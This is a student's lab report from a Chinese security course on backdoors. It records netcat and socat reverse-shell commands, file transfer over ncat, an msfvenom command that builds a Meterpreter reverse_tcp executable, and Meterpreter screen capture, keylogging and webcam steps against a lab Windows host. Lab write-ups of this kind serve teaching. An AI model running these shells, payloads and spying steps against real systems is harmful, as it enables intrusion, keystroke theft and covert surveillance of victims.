• 20145207《网络对抗》MAL后门原理与实践


    20145207《网络对抗》MAL后门原理与实践

    基础问题回答

    (1)例举一个后门进入到你系统中的可能方式?

    下载软件,淘宝虚假链接,买卖账号时侵入的黑客

    (2)例举一个后门启动起来(win及linux)的方式?

    软件伪装的方式来让他人在不知情况下点进去,

    (3)Meterpreter有哪些给你映像深刻的功能?

    获得摄像头控制权,获得system权限,得到密码

    (4)如何发现自己有系统有没有被安装后门?

    杀毒软件算不算(尴尬)

    实验总结与体会

    开始感觉屌屌的,虽然确实可以盗取获得一些东西,摄像权密码之类的,虽然很厉害,很能拿出去装x。但是要求条件好苛刻,需要关人家防火墙,还得跟人家桥接,同一网段还得知道ip。瞬间感觉好智障,人家怎么会那样让你侵入。。

    实践一:ncat

    知识要求:
    
    1.NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection);
    2.netcat实现简单服务器命令:nc -l -p //-l表明nc处于监听模式,-p指定端口号;
    3.nc的-e选项,指定连接后执行的程序。
    
    windows获得linux shell
    • windows作为攻击端开启监听模式ncat.exe -l -p 5207
    • linux反弹连接并且设置连接后启动shell。nc 172.30.202 5207 -e /bin/sh

    linux获得windows shell。

    相反的步骤,在windows下进行即可。

    ncat文件传输

    1、监听端windows命令:ncat.exe -lv port > filename

    2、传输端kali命令:nc windows_ip port < filename

    结果如下(传输的文件在ncat文件夹下):

    cron启动

    命令:crontab -e修改文件,crontab -l查看修改的文件。

    实践二:socat

    windows获得kali shell

    1、kali设置监听命令socat tcp-l:5207 system:bash,pty,stderr

    2、windows连接,并获取权限socat readline tcp:172.30.1.181 5207

    结果:

    kali获得window shell

    1、windows端如下图:

    2、kali端意思一样的,忘了截了。

    实践三:

    1、生成后门程序命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=linux_ip LPORT=444 -f exe >20145207.exe

    2、在windows端运行后门程序,并获得权限如下图所示:

    实践四

    1.获取目标主机当前屏幕界面

     (破虚拟机卡的我差点重写)

    2.获取键盘内容。keyscan_start为开始获取目标主机键盘输入内容,keyscan_dump为结束获取目的主机键盘内容,输入之后会显示键盘的输入内容

    3.获取目标主机摄像头记录

  • 相关阅读:
    linux上安装mysql
    linux 上nginx配置
    js人民币数字转大写
    pm2常用命令
    基于redis实现分布式锁
    Enterprise Architect 14破解版 安装包 安装教程
    一些有用的链接
    Linux安装Zookeeper
    根据朋友圈的网易云音乐分享找到人
    我的待做事项
  • 原文地址:https://www.cnblogs.com/20145207lza/p/6569380.html
Copyright © 2020-2023  润新知